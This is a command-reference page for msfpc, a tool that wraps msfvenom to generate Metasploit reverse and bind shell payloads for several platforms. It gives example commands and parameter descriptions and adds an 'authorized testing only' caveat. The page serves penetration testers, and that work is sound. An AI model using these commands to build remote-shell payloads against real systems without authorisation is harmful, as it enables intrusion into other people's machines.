LinuxCommandLibrary
GitHubF-DroidGoogle Play Store

msfpc

simplifies payload generation

TLDR

Generate Windows payload
$ msfpc windows [192.168.1.10]
copy
Generate Linux payload
$ msfpc linux [192.168.1.10]
copy
Generate with specific port
$ msfpc windows [192.168.1.10] [4444]
copy
Generate Meterpreter payload
$ msfpc windows msf [192.168.1.10]
copy
Generate staged reverse payload
$ msfpc windows staged reverse [192.168.1.10]
copy
Generate Python payload
$ msfpc python [192.168.1.10]
copy
Generate all payload types for an IP
$ msfpc loop [192.168.1.10]
copy

SYNOPSIS

msfpc type [domain/ip] [port] [cmd/msf] [bind/reverse] [staged/stageless] [tcp/http/https/findport] [batch/loop] [verbose_]

DESCRIPTION

msfpc (MSFvenom Payload Creator) simplifies payload generation. It wraps msfvenom functionality.The tool creates common payloads quickly. Generates handlers and multi-format outputs.

PARAMETERS

TYPE

Payload type: APK, ASP, ASPX, Bash, Java, Linux, OSX, Perl, PHP, Powershell, Python, Tomcat, or Windows.
DOMAIN/IP
Target IP address, domain, or interface name (e.g. eth0). Use "wan" to auto-detect external IP.
PORT
Port number (default: 443).
cmd
Use standard native command prompt/terminal shell.
msf
Use Meterpreter shell (default when available).
bind
Open a port on the target for the attacker to connect to.
reverse
Make the target connect back to the attacker (default).
staged
Split payload into parts (smaller, requires Metasploit).
stageless
Complete standalone payload (more stable).
tcp / http / https
Protocol for the connection. TCP is default.
batch
Generate all possible payloads for the given type.
loop
Generate one payload of every type.
verbose
Enable verbose output.

CAVEATS

Authorized testing only. Requires Metasploit. Detection likely without encoding.

HISTORY

msfpc was created to simplify msfvenom payload generation for penetration testers.

SEE ALSO

msfvenom(1), msfconsole(1), nmap(1)

Copied to clipboard
Kai